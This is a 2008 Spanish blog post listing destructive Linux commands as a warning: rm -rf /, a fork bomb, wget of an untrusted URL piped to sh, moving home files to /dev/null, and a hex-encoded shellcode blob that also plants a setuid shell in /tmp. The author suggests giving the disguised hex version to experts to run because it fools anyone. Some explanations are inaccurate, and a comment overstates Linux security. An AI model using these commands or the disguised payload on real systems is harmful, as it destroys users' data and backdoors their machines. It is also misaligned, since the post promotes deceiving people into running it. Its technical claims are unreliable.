domingo, 23 de noviembre de 2008

Muerte en LINUX


Las oportunidades de que alguién te engañe diciendote que uses algún comando para destruir tu sistema son muy altas asi que ponte vivo para que no te vean la cara aprendete esto:
Juguemos con la consola de Linux algunos también funciona sobre OS X ya que los dos sistemas están basados en Unix (perdón lepard si es UNIX) recordemos que todos necesitan autorización de súper usuario “root” con el famoso sudo

1. rm -rf / Este comando es típico borrará de manera recursiva todos los archivos en el directorio raíz con un simple comando despídete de tu Sistema Operativo de hecho también funciona con OS X Tiger ó Leopard si quieres verlo en video aqui en LINUX aqui en Tiger y aqui en Leopard

2. :(){::&};: ¿Qué cosa tan rara no? Pues esto ejecuta muchos procesos hasta que congela el sistema Esto puede conducir a la corrupción de datos.

3. wget http://fuente_no_confiable -O- sh
Esto descarga paquetes de alguna fuente no confiable y la ejecuta, debes tener mucho cuidado ya que puede ser código malicioso

4. mv /home/carpeta_home/* /dev/null
Este comando va a mover todo el contenido de tu carpeta Home a un directorio que no existe, esto significa que ya nunca volverás a ver tus archivos.

5. char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Este si esta padre es el mismo que el primero pero en hexadecimal así que si un experto sabe que hacer rm- rf/ puedes decirle que ejecute este ya que si despista a cualquiera

3 comentarios:

Cron dijo...

LOLz! Yo personalmente creo que no me gusta tanto Linux. Es muy bonito, y de repente me gusta apoyar al codigo libre.

Pero que le voy a hacer? Extraño demasiado los programas de Adobe y Visual Studio.

Ademas, mi tarjeta de video es ATI. El performance es horrible.

pechochomx dijo...

Ahora que lo estoy usando, se me hace algo ilógico la existencia del comando "sudo". Si hay cosas que son peligrosas, como estos casos, simplemenete no se deberían ejecutar y listo.Esto nos demuestra que cualquier OS de cualquier compañía, ya sea libre o comercial, está sujeto siempre a muchas vulnerabilidades y ninguno es 100% seguro y confiable.

Cronq, tienes razón: yo extraño el Visual Studio. He estado usando Gambas, pero es muy limitado y nomas sirve como para jugar.

Alberto dijo...

el comando sudo es imprescindible para la administración del sistema y si bien no hay ninǵun OS completamente seguro, si hay unos que son más seguros que otros. Definitivamente Linux es muchísimo más seguro que cualquier sistema Windows...
Es recomendable leer este artículo:

http://www.kriptopolis.org/linux-virus-popularidad

Es altamente significativo este párrafo:
Siempre nos queda el recurso de irnos a seguridades mucho más avanzadas, ya presentes en el núcleo de Linux desde hace años pero casi siempre innecesarias. Podríamos activar SELinux. Eso dejaría fuera de combate hasta a los javascripts, ya que podríamos fácilmente prohibir al browser cualquier conexión que no sea http o https. Esto no es comparable a los "seudo-firewalls" para windows ya que en el caso de Linux la seguridad está embebida en el mismo núcleo, y no sólo controla paquetes tcp/ip sino todo tipo de actividades de los programas, incluso cosas tan inofensivas como listar el contenido el disco. Es más, el activar SELinux nos protegería incluso ante fallos de seguridad en los programas, ya que en este punto se vuelve irrelevantes los permisos del usuario. Podríamos publicar en internet la clave del root y aún así seguir tranquilos.

y este:

Eliminar un virus de windows puede ser una pesadilla. El virus toma el control en tal forma que los antivirus y eliminadores no funcionan. Hay que arrancar desde un diskette o CD pero en ese caso el virus puede aprovechar las "características de protección" de windows para dificultar la tarea. Incluso lograr eliminarlo no es ninguna garantía porque podría quedar algún disparador que lo reinstale al volver a arrancar. Y para colmo, los eliminadores de virus sólo eliminan virus conocidos. Contra un virus nuevo no hay NINGUNA solución. Lo más práctico suele ser formatear y reinstalar.

En cambio en Linux el virus sólo puede estar en un lugar: el home del usuario. Ante cualquier problema basta con crear un usuario nuevo para tener en segundos un sistema totalmente funcional y libre de virus. No importa qué virus sea o si es conocida su manera de actuar o no. Un usuario diferente no puede estar infectado, se crea uno o se cambia a otro existente y problema solucionado en 10 segundos.


Saludos

P.d. Linux es la caña... lo que le falta es software potente detrás .... pero no tanto como alguno se piensa... juego tiene a miles yo juego al WOW o Half Life en Linux mejor que en mi otro ordenador con Windows.... wine, cedega, crossover, playonlinux... está muy avanzado el software de capas de compatibilidad y emuladores. Simplemente falta portar aplicaciones privativas que ni siquiera han pensado en migrar a Linux porque es un mercado que no les interesa. Lo mejor es un sistema dual: Una partición pequeñita con Xp, Miopía o 7 con tu software favorito de juegos/edición de audio/edición de vídeo etc y el resto (oficina,internet, manejo de archivos etcetcetc) Linux....
También está la alternativa de poder quitar windows del todo.....que para mí ya lo he logrado... habrá gente que tendŕa que esperar.